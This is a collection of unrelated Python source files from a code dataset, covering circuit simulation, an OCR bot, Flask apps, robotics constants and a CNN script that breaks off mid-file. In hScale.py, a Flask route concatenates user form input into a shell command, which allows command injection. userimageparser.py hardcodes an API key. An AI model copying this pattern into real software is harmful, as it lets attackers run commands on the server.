+{"seq_id":"22033175","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Nov 11 22:27:34 2015\n\n@author: Brenda_Brandy\n\"\"\"\n\nfrom __future__ import division, print_function\n\nfrom numpy import array, arange\n##from pylab import plot, show\nfrom visual import *\n\n\"\"\"\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfig = plt.figure()\nax = fig.add_subplot(111, projection='3d')\n\"\"\"\n\n\n\"\"\"\n#coefficients\nc1 = 1.0 / 10.0\nc2 = 1.0 / 0.5\nG = 0.7\nL = 1.0 / 7.0\n\"\"\"\n\n#different initial conditions\n\n#for the large stable limit cycle\n#r_array = array([ 1.45305 ,-4.36956 ,0.15034 ],float)\n\n#for the large stable limit cycle\n#r_array = array([ 9.13959 , - 1.35164 , - 59.2869],float)\n\n#for the hyperbolic periodic orbit with period T = 3.93615\n#r_array = array([ 10.00717 , 0.80100 ,-23.90375 ],float)\n\n#for the double scroll attractor\nr_array = array([ 0.15264, -0.02281 ,0.38127 ],float)\n\n#coefficients for double scroll attractor\nc1 = 1.0 / 9.0\nc2 = 1.0 \nG = 0.7\nL = 1.0 / 7.0\n\n\n\"\"\"\n#Negative Resistor current, piecewise function voltage should be vc1\n\ndef g(v):\n\tif v > -1 and v < 1:\n\t\treturn -4.0 * v\n\telif v > 1: #if v is bigger than 1\n\t\treturn -4.0 - 0.1*(v-1.0)\n\telse: #if v is less than -1\n\t\treturn 4.0 - 0.1*(v+1.0)\n\n\"\"\"\n\n#Negative Resistor current, piecewise function voltage should be vc1\n#for double scroll\ndef g(v):\n\tif v > -1 and v < 1:\n\t\treturn -0.8* v\n\telif v > 1: #if v is bigger than 1\n\t\treturn -0.8 - 0.5*(v-1.0)\n\telse: #if v is less than -1\n\t\treturn 0.8 - 0.5*(v+1.0)\n\n#define vector function f\ndef f(r_array,t):\n x = r_array[0] #voltage across c1\n y = r_array[1] #voltage across c2\n z = r_array[2] #current across L\n fx = (G*(y-x) - g(x) ) / c1\n fy = (G*(x - y) + z) / c2\n fz = - y / L\n return array([fx,fy,fz],float)\n\n#initial condition and step size\nt_i = 0.0\n#t_f = 50.0\nt_f = 300.0\nN = 10000.0\nh = (t_f-t_i) / N\n\ntpoints = arange(t_i,t_f,h)\nxpoints = []\nypoints = []\nzpoints = []\n\n#fourth order RK loop\nfor t in tpoints:\n xpoints.append(r_array[0])\n ypoints.append(r_array[1])\n zpoints.append(r_array[2])\n k1 = h*f(r_array,t)\n k2 = h*f(r_array+0.5*k1, t+0.5*h)\n k3 = h*f(r_array+0.5*k2, t+0.5*h)\n k4 = h*f(r_array+k3, t+h)\n \n r_array += (k1+2*k2+2*k3+k4)/6.0\n\n#plot y against t \n#plot(tpoints,ypoints)\n#show()\n\n#plot z againt x\n#plot (xpoints,zpoints)\n#show()5\n\n\"\"\"\nax.plot(xpoints, ypoints, zpoints, label = \"double scroll\")\nax.legend()\nplt.show()\n\"\"\"\n\n#for animation\nball = sphere(make_trail=True, trail_type=\"curve\", interval=1, retain=20)\nball2 = sphere(make_trail=True, trail_type=\"curve\", interval=1, retain=20, color = color.blue)\nball.radius = 0.1\nball2.radius = 0.1\nball2.trail_object.color=color.blue\nball.pos = (xpoints[0],ypoints[0],zpoints[0])\npointer = arrow(pos=(xpoints[500],ypoints[500],zpoints[500]),axis=(xpoints[500]-xpoints[0],ypoints[500]-ypoints[0],zpoints[500]-zpoints[0]), shaftwidth=0.05)\nn = 500\nfor i in range(1, int(N)-n):\n rate(120)\n ball.pos = (xpoints[i], ypoints[i], zpoints[i])\n ball2.pos = (xpoints[i+n], ypoints[i+n], zpoints[i+n])\n pointer.pos = (xpoints[i+n],ypoints[i+n],zpoints[i+n])\n pointer.axis = (-xpoints[i+n]+xpoints[i],-ypoints[i+n]+ypoints[i],-zpoints[i+n]+zpoints[i])\n \n\n","sub_path":"chuacircuit_trace.py","file_name":"chuacircuit_trace.py","file_ext":"py","file_size_in_byte":3192,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"334713843","text":"import io\nimport os\nimport requests\nimport json\nimport string, re\nimport unidecode\nfrom support_classes.botstrings import BotStrings\nfrom support_classes.botkeyboardmanager import KeyboardManager\nfrom support_classes.userintent import UserIntent\n\nclass UserImageParser:\n\n\tdef __init__(self):\n\t\tself.log = \"LOGGING - USERIMAGEPARSER: \"\n\t\tself.botstrings = BotStrings()\n\t\tself.keyboardmanager = KeyboardManager()\n\n\tdef scan_image(self, file_id, messenger, destination_id, customer_project_list, target_user):\n\t\tpayload = {'isOverlayRequired': False,\n\n\t\t\t\t 'apikey': '477608fa3788957',\n\n\t\t\t\t 'language': 'eng',\n\n\t\t\t\t }\n\t\tfilename = file_id + '.jpeg'\n\t\tprint(self.log + \"CALLING OCR API\")\n\t\tmessenger.send_message(destination_id, self.botstrings.LOOKING_AT_IMAGE, None)\n\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\n\t\twith open(filename, 'rb') as f:\n\n\t\t\tr = requests.post('https://api.ocr.space/parse/image',\n\n\t\t\t\t\t\t\t files={filename: f},\n\n\t\t\t\t\t\t\t data=payload,\n\n\t\t\t\t\t\t\t )\n\t\tmessenger.send_message(destination_id, self.botstrings.READING_IMAGE, None)\n\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\n\t\tprint(self.log + \"DECODING IMAGE CONTENT\")\n\t\tresult_content = r.content.decode()\n\t\tjson_data = json.loads(result_content)\n\t\tprint(json_data[\"ParsedResults\"][0][\"ParsedText\"])\n\t\tself.get_trailer_number(json_data[\"ParsedResults\"][0][\"ParsedText\"], messenger, destination_id, customer_project_list, target_user)\n\t\t# return trailer_number, trailer_number_found\n\n\tdef get_trailer_number(self, image_content, messenger, destination_id, customer_project_list, target_user):\n\t\timage_data = []\n\t\ttrailer_number = []\n\t\ttrailer_choice = \"\"\n\t\tcontract_no = \"\"\n\t\tload_no = None\n\t\ttrailer_number_found = False\n\t\tis_digital_order = False\n\t\tlist_of_numbers = []\n\t\tprint(self.log + \"SPLITTING IMAGE CONTENT INTO LINES\")\n\t\tfor line in image_content.splitlines():\n\t\t\t# alpha_num = ''.join(e for e in line if e.isalnum())\n\t\t\t# unaccented_string = unidecode.unidecode(alpha_num)\n\t\t\talpha_num = re.sub(r'[^\\w]', ' ', line)\n\t\t\timage_data.append(alpha_num.lstrip().rstrip())\n\n\t\tfor data in image_data:\n\t\t\talphabet = ''.join(i for i in data if not i.isdigit())\n\t\t\tprint(self.log + \"IMAGE CONTAINS \" + data)\n\t\t\tif alphabet.lower().replace(' ', '') in self.botstrings.DO_INDICATOR or alphabet.lower().replace(' ', '') in self.botstrings.CONTRACT_INDICATOR:\n\t\t\t\tprint(self.log + \"IMAGE DATA COMES FROM A DIGITAL ORDER - KEYWORD: \" + data)\n\t\t\t\tis_digital_order = True\n\t\t\t\tbreak\n\n\t\tif is_digital_order:\n\t\t\tproject_name_results = []\n\t\t\tmessenger.send_message(destination_id, self.botstrings.DELIVERY_ORDER, None)\n\t\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\t\t\tfor data in image_data:\n\t\t\t\tif data.isdigit():\n\t\t\t\t\tlist_of_numbers.append(data)\n\t\t\t\tprint(self.log + \"DELIVERY ORDER CONTAINS \" + data)\n\t\t\t\talphabet = ''.join(i for i in data if not i.isdigit())\n\t\t\t\t# CHECK FOR TRAILER\n\t\t\t\tcontains_prefix, prefix = self.botstrings.contains_trailer_prefix(data)\n\t\t\t\tcontains_contract_prefix, contract_no = self.botstrings.contains_contract_no(data)\n\t\t\t\tif contains_prefix:\n\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS TRAILER_PREFIX: \" + data)\n\t\t\t\t\tif self.botstrings.has_numbers(data):\n\t\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS TRAILER_PREFIX AND HAS NUMBERS: \" + data)\n\t\t\t\t\t\ttrailer_number.append(data)\n\t\t\t\t\t\ttrailer_number_found = True\n\t\t\t\t\t\tcontinue\n\t\t\t\t\telse:\n\t\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS TRAILER_PREFIX BUT NO NUMBERS: \" + data)\n\t\t\t\t\n\t\t\t\t# CHECK FOR CONTRACT NUMBER\n\t\t\t\tif contains_contract_prefix:\n\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS CONTRACT PREFIX: \" + data)\n\t\t\t\t\tprint(self.log + \"DELIVERY ORDER IMAGE DATA CONTAINS CONTRACT NO: \" + contract_no)\n\t\t\t\t\tcontinue\n\t\t\t\telif data in customer_project_list.customer_project_list:\n\t\t\t\t\tprint (self.log + \"DATA EXISTS IN CUSTOMER PROJECT LIST. CONTRACT NO: \" + data)\n\t\t\t\t\tcontinue\n\t\t\t\telse:\n\t\t\t\t\ttop_result = customer_project_list.search_project_by_name(data)\n\t\t\t\t\tif top_result != None:\n\t\t\t\t\t\tproject_name_results.append(top_result)\n\t\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\t\t\tproject_name_results = sorted(project_name_results, key= lambda x: x[1], reverse=True)\n\t\t\tprint(project_name_results[0])\n\n\t\t\tif trailer_number_found:\n\t\t\t\tfor trailer_candidate in trailer_number:\n\t\t\t\t\tif all(x.isalnum() for x in trailer_candidate):\n\t\t\t\t\t\ttrailer_choice = trailer_candidate\n\t\t\t\t\t\tbreak\n\t\t\tfor number in list_of_numbers:\n\t\t\t\tif self.botstrings.is_load_no(number):\n\t\t\t\t\tload_no = number\n\t\t\t\t\tbreak\n\n\t\t\tnew_intent = UserIntent(\"trailer_action\", \"\")\n\t\t\tnew_intent.action_type = \"park\"\n\t\t\tnew_intent.trailer_unit = trailer_choice\n\t\t\tif project_name_results[0][0] != None:\n\t\t\t\tnew_intent.customer_project = project_name_results[0][2]\n\t\t\tif load_no != \"\":\n\t\t\t\tnew_intent.load_no = load_no\n\t\t\ttarget_user.user_intent = new_intent\n\t\t\t# message_string = \"Trailer no: \" + trailer_choice + \"\\n\" + \"Project name: \" + project_name_results[0][0]\n\t\t\t# reply_keyboard = self.keyboardmanager.build_reply_keyboard([[\"Yes\"]])\n\t\t\t# messenger.send_message(destination_id, message_string, reply_keyboard)\n\n\t\t\tbot_understanding, new_inline_keyboard_items = target_user.user_intent.bot_understanding()\n\t\t\tif new_inline_keyboard_items != None:\n\t\t\t\tnew_main_keyboard = self.keyboardmanager.build_reply_keyboard(new_inline_keyboard_items, True)\n\t\t\telse:\n\t\t\t\tnew_main_keyboard = self.keyboardmanager.remove_reply_keyboard(True)\n\t\t\tmessenger.send_message(destination_id, bot_understanding, new_main_keyboard)\n\t\telse:\n\t\t\tprint(self.log + \"IMAGE DATA DOES NOT COME FROM A DIGITAL ORDER\")\n\t\t\tmessenger.send_message(destination_id, \"Is it a trailer plate? Hmm...\", None)\n\t\t\tmessenger.send_chat_action(destination_id, \"typing\")\n\t\t\tsearch_string = \"\"\n\t\t\tfor data in image_data:\n\t\t\t\tprint(self.log + \"IMAGE DATA CONTAINS \" + data)\n\t\t\t\tsearch_string_item = data\n\t\t\t\tcontains_prefix, prefix = self.botstrings.contains_trailer_prefix(data)\n\t\t\t\tif contains_prefix:\n\t\t\t\t\tprint(self.log + \"IMAGE DATA CONTAINS TRAILER PREFIX: \" + data)\n\t\t\t\t\tsearch_string_item = prefix\n\t\t\t\t\ttrailer_number_found = True\n\t\t\t\tsearch_string += search_string_item\n\t\t\tprint(self.log + \"IMAGE DATA FROM TRAILER: \" + search_string)\n\t\t\tsearch_string.lstrip()\n\t\t\talphabet = ''.join(i for i in search_string if not i.isdigit())\n\t\t\t\n\t\t\tprint(self.log + \"IMAGE DATA CONTAINS TRAILER_PREFIX: \" + alphabet)\n\t\t\ttrailer_number = search_string\n\n\n\t\tif trailer_number_found:\n\t\t\tprint (self.log + \"TRAILER UNIT IS FOUND\")\n\t\t\tprint (trailer_number)\n\t\telse:\n\t\t\tprint (self.log + \"TRAILER UNIT IS NOT FOUND\")\n\n\n# {\"ParsedResults\":\n# \t[\n# \t\t{\"TextOverlay\":\n# \t\t\t{\"Lines\":[],\"HasOverlay\":false,\"Message\":\"Text overlay is not provided as it is not requested\"\n# \t\t\t},\n# \t\t\"FileParseExitCode\":1,\n# \t\t\"ParsedText\":\"TRC \\r\\n2245T \\r\\n\",\"ErrorMessage\":\"\",\"ErrorDetails\":\"\"}],\"OCRExitCode\":1,\"IsErroredOnProcessing\":false,\"ErrorMessage\":null,\"ErrorDetails\":null,\"ProcessingTimeInMilliseconds\":\"310\",\"SearchablePDFURL\":\"Searchable PDF not generated as it was not requested.\"}\n","sub_path":"support_classes/userimageparser.py","file_name":"userimageparser.py","file_ext":"py","file_size_in_byte":7021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"502605875","text":"# https://leetcode.com/problems/meeting-rooms-ii/\n\n# Given an array of meeting time intervals consisting of start and end times [[s1,e1],[s2,e2],...] (si < ei),\n# find the minimum number of conference rooms required.\n\n# For example,\n#\n# Given [[0, 30],[5, 10],[15, 20]],\n#\n# return 2.\n\n# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\n\n\n# Definition for an interval.\n# class Interval(object):\n# def __init__(self, s=0, e=0):\n# self.start = s\n# self.end = e\n\n\n\nclass Solution(object):\n def minMeetingRooms(self, intervals):\n \"\"\"\n :type intervals: List[Interval]\n :rtype: int\n \"\"\"\n import heapq\n heap = []\n num = 0\n\n heapq.heapify(heap)\n\n intervals.sort(lambda x, y: x.start - y.start)\n\n for i in range(len(intervals)):\n if len(heap) == 0:\n heapq.heappush(heap, intervals[i].end)\n num += 1\n continue\n\n if heap[0] <= intervals[i].start:\n heapq.heappop(heap)\n heapq.heappush(heap, intervals[i].end)\n else:\n heapq.heappush(heap, intervals[i].end)\n num += 1\n\n return num\n\n\n\n","sub_path":"253_meeting_rooms_ii.py","file_name":"253_meeting_rooms_ii.py","file_ext":"py","file_size_in_byte":1298,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"436117004","text":"import time\nfrom flask import Flask, request, abort\nfrom datetime import datetime\n\n\napp = Flask(__name__)\ndb = [\n {\n 'name': 'Nick',\n 'text': 'Hello!',\n 'time': time.time()\n },\n {\n 'name': 'Ivan',\n 'text': 'Hello, Nick!',\n 'time': time.time()\n }\n]\n\n\n@app.route(\"/\")\ndef hello():\n return \"Hello, Messenger!\"\n\n\n@app.route(\"/status\")\ndef status():\n my_status = {\n 'status': True,\n 'name': \"My Messenger\",\n 'time': str(datetime.now()),\n 'number_of_messages': len(db),\n 'number_of_users': len(set(i['name'] for i in db))\n }\n return my_status\n\n\n@app.route(\"/send\", methods=['POST'])\ndef send_message():\n data = request.json\n if not isinstance(data, dict):\n return abort(400)\n if 'name' not in data or 'text' not in data:\n return abort(400)\n name = data['name']\n text = data['text']\n if not isinstance(name, str) \\\n or not isinstance(text, str):\n return abort(400)\n if name == '' or text == '':\n return abort(400)\n db.append({\n 'name': name,\n 'text': text,\n 'time': time.time()\n })\n if text == '/help':\n db.append({\n 'name': 'BOT',\n 'text': 'Ha-ha, looser!',\n 'time': time.time()\n })\n return {'OK': True}\n\n\n@app.route(\"/messages\")\ndef get_messages():\n try:\n after = float(request.args['after'])\n except ValueError:\n abort(400)\n messages = []\n for message in db:\n if message['time'] > after:\n messages.append(message)\n return {'messages': messages[:50]}\n\n\napp.run()\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1647,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"194826019","text":"import sys\nimport os\nimport glob\nimport numpy as np\nfrom astropy.io import fits\n\n# this function will create a linearely binned version\n# of a particular spectrum\nfrom srebin import linlin\n\n\"\"\"Add rebinned sky_subtracted to the x_multi*.fits\"\"\"\n\nff = glob.glob( \"../xsky/2019????v???/exp0?/x_*.fits\")\n\npattern = \"/work/03946/hetdex/maverick/red1/reductions/{}/virus/virus0000{}/{}/virus/{}\"\n\ndef get_rebinned(fin ,extensions=['spectrum', 'sky_spectrum', 'fiber_to_fiber'], start = 3494.74, step = 1.9858398, stop = 5500.):\n\n\t\"\"\" #print(\"Reading {}\".format(fin))\n hdu = fits.open(fin)\n\n wl = hdu['wavelength'].data\n\n #start,stop = 3503.9716796, 5396.477\n N = int( np.ceil( (stop - start)/step ) )\n\n rebinned = {}\n\t\"\"\"\n\n\t#start,stop = 3503.9716796, 5396.477\n\tN = int( np.ceil( (stop - start)/step ) )\n\n\t#print(\"Reading {}\".format(fin))\n\thdu = fits.open(fin)\n\n\twl = hdu['wavelength'].data\n\n\t#start,stop = 3503.9716796, 5396.477\n\trebinned = {}\n\tfor ext in extensions:\n\t\t#for j in range(hdu[ext].data.shape[1]): # This might cause big errors...\n\t\t#isnull = np.unique(hdu[ext].data[:,j])\n\t\t#isnull = isnull[np.where(isnull != 0)]\n\t\t#if len(isnull)==0:\n\t\t# hdu[ext].data[:, j] = np.ones(hdu[ext].data.shape[0])*np.nan\n\t\t#print(\"Rebinning {}\".format(ext))\n\n\t\tnew = np.zeros([wl.shape[0], N])\n\t\thduextdata = hdu[ext].data\n\t\tfor i in range(wl.shape[0]):\n\t\t\tw = wl[i,:]\n\t\t\tf = hduextdata[i,:]\n\t\t\tstart = start\n\t\t\tstep = step\n\t\t\tstop = stop\n\t\t\tlw, lf = linlin(w, f, start, step, stop, dowarn=False)\n\t\t\t#lw = np.arange(start, stop, step)\n\t\t\t#lf = model_resampled_10A = spectres(lw, w, f)\n\n\t\t\t# hack as they may not all necessareyly have the same length\n\t\t\tnew[i,:min(N, len(lf))] = lf[:min(N, len(lf))]\n\n\t\trebinned[ext] = new\n\treturn lw, rebinned\n\nfor fin in ff[:3]:\n\n\tnight = fin.split(\"/\")[2][:-4]\n\tshot = fin.split(\"/\")[2][-3:]\n\texp = fin.split(\"/\")[3]\n\tname = fin.split(\"/\")[-1][2:]\n\n\tnewfin = pattern.format(night, shot, exp, name)\n\t\n\thdu = fits.open(fin)\n\ttry:\n\t\tskysub = hdu[\"sky_subtracted_rb\"].data\n\t\tfiber_to_fiber = hdu[\"fiber_to_fiber_rb\"].data\n\t\tprint(\"Found sky subtracted and fiber to fiber rb in \"+fin)\n\t\thdu.close()\n\texcept KeyError:\n\t\tww, rb = get_rebinned(newfin, extensions=[\"sky_subtracted\",\"fiber_to_fiber\"])\n\t\thdu.append(fits.ImageHDU(rb[\"sky_subtracted\"], name=\"sky_subtracted_rb\"))\n\t\thdu.append(fits.ImageHDU(rb[\"fiber_to_fiber\"], name=\"fiber_to_fiber_rb\"))\n\t\thdu.writeto(fin, overwrite=True)\n\t\tprint(\"Wrote to \"+fin)\n","sub_path":"add_skysub.py","file_name":"add_skysub.py","file_ext":"py","file_size_in_byte":2453,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"102332782","text":"import os\nimport json\nfrom nanome.util import Logs\n\ndefault_json_string = \"\"\"{\n \"host\":\"127.0.0.1\",\n \"port\":8888,\n \"key\":\"nts_key\",\n \"plugin_files_path\":\"~/Documents/nanome-plugins\"\n}\"\"\"\n\ndefault_json = json.loads(default_json_string)\n\n\ndef _setup_file():\n s = \"/\"\n\n home = os.getenv('APPDATA')\n if home is None:\n home = os.getenv('HOME')\n directory = home + s + \".nanome_lib\"\n config = directory + s + \"config.txt\"\n\n if not os.path.isdir(directory):\n try:\n os.mkdir(directory)\n except:\n return False\n if not os.path.isfile(config):\n try:\n Logs.message(\"Creating config file with path \" + config)\n _setup_clean_config(config)\n except:\n return False\n return config\n\n\ndef _setup_clean_config(config_path):\n with open(config_path, \"w\") as file:\n json.dump(default_json, file)\n\n\ndef fetch(key):\n \"\"\"\n | Fetch a configuration entry from your nanome configuration.\n | Built-in keys are:\n | host - your NTS server address\n | port - your NTS server port\n | key - your NTS key file or string\n | plugin_files_path - where your plugins will store files\n\n :param key: The key of the config value to fetch\n :type key: :class:`str`\n \"\"\"\n if config_path:\n try:\n with open(config_path, \"r\") as file:\n config_json = json.load(file)\n return config_json[key]\n except KeyError:\n value = default_json[key]\n set(key, value)\n return value\n else:\n return default_json[key]\n\n\ndef set(key, value):\n \"\"\"\n | Set a configuration entry in your nanome configuration.\n | Built-in keys are host, port, key and plugin_files_path.\n | Default values are 127.0.0.1, 8888, nts_key and ~/Documents/nanome-plugins\n\n :param key: The key of the config value to set\n :type key: :class:`str`\n :param value: The value to set the config item to\n :type value: :class:`str`\n \"\"\"\n if config_path:\n with open(config_path, \"r\") as file:\n config_json = json.load(file)\n config_json[key] = value\n with open(config_path, \"w\") as file:\n json.dump(config_json, file)\n return True\n return False\n\n\nconfig_path = _setup_file()\n","sub_path":"nanome/util/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":2330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"167634844","text":"#!/usr/bin/env python\n\"\"\" Constants\nCourse: EE 106A, Fall 2016\nWritten by: Valmik Prabhu, 12/5/16\nUsed by: EE106A Project, 12/5/16\n\nThis code contains constants for the UR5:\njoint lengths\njoint axes\ninitial joint positions\n\n\nSources:\nJoint lengths from:\nhttp://www.zacobria.com/temp/ur5_dimensions.jpg\n\nJoint axes and positions from testing, with help from:\n\"Analytic Inverse Kinematics for the Universal Robots UR-5/UR-10 Arms\", by Kelsey P. Hawkins, December 7, 2013\n\n\"\"\"\n\nimport numpy as np\nimport math\n\n## Angle restrictions and tolerance\n# Meant to keep the robot from a singularity and to restrict number of solutions\n\n\ntolerance = -1 # safety factor in degrees\n\n# Angle restrictions in degrees\ntheta3min = 0\ntheta3max = 180\ntheta2min = -120\ntheta2max = 0\n\n## UR5 Data ************************************\n\n# scale should be 1000 if in mm instead of m\nscale = 1\n\nl_1 = .0892*scale\nl_2 = .425*scale\nl_3 = .392*scale\nl_4 = .1093*scale\nl_5 = .0948*scale\nl_6 = .0825*scale\n\nomega1 = np.array([0, 0, 1])\nq1 = np.array([0, 0, 0])\nomega2 = np.array([0, -1, 0])\nq2 = np.array([0, 0, l_1])\nomega3 = np.array([0, -1, 0])\nq3 = np.array([-l_2, 0, l_1])\nomega4 = np.array([0, -1, 0])\nq4 = np.array([-l_2 - l_3, 0, l_1])\n\nqe = np.array([-l_2 - l_3 - l_5, -l_4, l_1 - l_6])\n\n# Initial angle\nrx = math.pi\nry = 0\nrz = math.pi/2\n\n\ntheta4offset = math.pi/2\ntheta5 = -math.pi/2\ntheta6 = 0\n\n\n# HW3 Numbers for testing *****************************\n# omega1 = np.array([0, 0, 1])\n# q1 = np.array([0, 0, 0])\n# omega2 = np.array([-1, 0, 0])\n# q2 = np.array([0, 0, 5])\n# omega3 = np.array([-1, 0, 0])\n# q3 = np.array([0, 4, 5])\n# omega4 = np.array([0, 0, 1])\n# q4 = np.array([0, 7, 5])\n# omega5 = np.array([-1, 0, 0])\n# q5 = np.array([0, 7, 5])\n# omega6 = np.array([0, 1, 0])\n# q6 = np.array([0, 7, 5])\n# qe = np.array([0, 9, 5])","sub_path":"team13project/src/savethezumy/src/constants.py","file_name":"constants.py","file_ext":"py","file_size_in_byte":1810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"372754729","text":"fruit = {\"orange\": \"a sweet, orange, citrus fruit\",\n \"apple\": \"good for making cider\",\n \"lemon\": \"a sour, yellow citrus fruit\",\n \"grape\": \"a small, sweet fruit growing in bunches\",\n \"lime\": \"a sour, green citrus fruit\"}\n\nprint(fruit)\n\nveg = {\"cabbage\" : \"every child's favourite\",\n \"sprouts\": \"mmmmm, lovely\",\n \"spinach\": \"can I have some more fruit, please\"}\n\nprint(veg)\n\n# =================================\n# Combining the 2 dictionaries\n# dictionary does not return anything\n# 1st example is adding fruit dictionary to veg\n# 2nd example is adding veg dictionary to fruit\n# =================================\n# veg.update(fruit)\n# print(\"fruit dictionary added to veg dictionary: \\n {}\".format(veg))\n#\n# fruit.update(veg)\n# print(\"veg dictionary added to fruit dictionary: \\n {}\".format(fruit))\n\n\n# ====================================\n# Create a new dictionary by combining both fruit and veg dictionary\n# without changing the original dictionary\n# use copy command and then update command\n# ====================================\n\nnice_and_nasty=fruit.copy()\nnice_and_nasty.update(veg)\nprint(\"Nice And Nasty Dictionary: \\n {}\".format(nice_and_nasty))","sub_path":"Dictionaries_And_Sets/Additional_Methods_In_Dictionary.py","file_name":"Additional_Methods_In_Dictionary.py","file_ext":"py","file_size_in_byte":1196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"520894501","text":"from app import app\nfrom app import execmd\nfrom flask import request, flash, redirect, url_for, render_template\nimport commands\n\n@app.route('/hscale', methods = ['POST'])\ndef hscale():\n vcontainer = request.form['container']\n vresource = request.form['resource']\n vvalue = request.form['value']\n ret = \"Value Error\"\n\n if vresource == \"cpu\":\n try:\n vnumber = int(vvalue)\n except ValueError:\n return 'Value Error'\n vnumber = 1024 * vnumber / 100\n ret = commands.getoutput(execmd + \"update --cpu-shares \" + str(vnumber) + \" \" + vcontainer) \n\n if vresource == \"memory\":\n ret = commands.getoutput(execmd + \"update --memory \" + vvalue + \" \" + vcontainer) \n\n return render_template(\"index.html\",\n text = ret\n )\n\n\n\n","sub_path":"app/hScale.py","file_name":"hScale.py","file_ext":"py","file_size_in_byte":807,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"478554419","text":"\"\"\"\r\n\n\nIn **Mirror Cipher** , encoding is done by switching message characters with\nits mirror opposite character of the key.\n\nCreate a function that takes two arguments; a `message` and an optional `key`,\nand return the **encoded message**.\n\nThere are some variations on the rules of encipherment. One version of the\ncipher rules are outlined below:\n\n message = \"Mubashir Hassan\"\n key = \"edabitisamazing\"\n \n mirror_cipher(message, key) ➞ \"tuzishar hissid\"\n\n **Step 1:** Replace all characters of the given message with mirror character\nin the key:\n\n M = t, # 't' is mirror character of 'M'\n u = u, # 'u' is not part of the key\n b = z, # 'z' is mirror character of 'b'\n a = i, and so on ...\n\n **Step 2:** Return encoded message in lower case:\n\n \"tuzishar hissid\"\n\nIf optional `key` is not given, consider the whole alphabet as a default (i.e.\n`key` = **\"abc..z\"** ).\n\n### Examples\n\n mirror_cipher(\"Mubashir Hassan\", \"edabitisamazing\") ➞ \"tuzishar hissid\"\n \n mirror_cipher(\"Matt MacPherson\") ➞ \"nzgg nzxksvihlm\"\n \n mirror_cipher(\"Airforce is best\", \"pilot\") ➞ \"aorfirce os besp\"\n\n### Notes\n\nIgnore case of message and key, (e.g. \"M\" = \"m\").\n\n\"\"\"\r\n\nfrom string import ascii_lowercase as al\ndef mirror_cipher(message, key=al):\n message, key = message.lower(), key.lower()\n result = \"\"\n for letter in message:\n if not letter in key:\n result += letter\n else:\n index = key.find(letter)\n mirror = key[-index-1]\n result += mirror\n return result\n\n","sub_path":"auLEvdvBT5PRnALvn_11.py","file_name":"auLEvdvBT5PRnALvn_11.py","file_ext":"py","file_size_in_byte":1518,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"559170830","text":"\"\"\"\nThis code takes the DATASET_PATH path and MODEL_PATH to predict the\nexpected index, the model must be provided with the correct data.\n\n\"\"\"\n\n# TODO calculate confusion matrix metrics\n\nimport numpy as np\nimport pandas as pd\nfrom sklearn.metrics import confusion_matrix, ConfusionMatrixDisplay, accuracy_score, \\\n precision_score, recall_score, f1_score, classification_report\nimport seaborn as sns\nfrom tensorflow.keras.models import load_model\nimport matplotlib.pyplot as plt\nfrom CNN import load_data\nfrom CNN import predict\nfrom CNN import get_mappings\nfrom Notes_to_Frequency import notes_to_frequency\nfrom Notes_to_Frequency import notes_to_frequency_6\nfrom Notes_to_Frequency import notes_to_frequency_limited\n\nMODEL_DATASET_PATH = \"Dataset_JSON_Files/Simulated_Dataset_Matlab_12frets_1.json\"\nDATASET_PATH = \"Dataset_JSON_Files/Only_G4_Recorded_1.json\" # data used for predictions\nMODEL_PATH = \"CNN_Model_Files/CNN_Model_Simulated_Dataset_Matlab_12frets_1.h5\"\nRESULTS_PATH = \"Results/CNN_Results/\"\nMODEL_NAME = \"Simulated_Dataset_Matlab_12frets_1\"\nDATASET_NAME = \"Only_G4_Recorded_1\"\nPLOT_TITLE = \"Only_G4_Recorded_1\" # Dataset name to be used in graph titles\nLABELS = get_mappings(MODEL_DATASET_PATH)\n\n\ndef prepare_data(dataset):\n # load dataset\n X, y = load_data(dataset)\n print(\"initial shape of X = {}\".format(X.shape))\n\n # CNN expects 3D array inputs are only 2D\n X = X[..., np.newaxis] # 4D array -> [num_samples, number of time bins, mfcc_coefficients, channel]\n print(\"returned shape of X = {}\".format(X.shape))\n print(\"returned shape of y = {}\".format(y.shape))\n\n return X, y\n\n\nif __name__ == \"__main__\":\n # load model\n model = load_model(MODEL_PATH)\n\n # summarize model.\n model.summary()\n\n # load data\n X, y = prepare_data(DATASET_PATH)\n\n # make prediction on a sample\n #predicted_note = []\n predicted_index = []\n prediction = pd.DataFrame(columns=LABELS)\n #print(LABELS)\n #prediction.columns = list(LABELS)\n\n for i in range(len(X)):\n index, pred = predict(model, X[i], y[i])\n #predicted_note.append(note)\n predicted_index.append(index)\n prediction.loc[len(prediction.index)] = pred[0]\n\n #print(y)\n # print(predicted_index)\n # print full dataframe\n with pd.option_context('display.max_rows', None,\n 'display.max_columns', None,\n 'display.precision', 3,\n 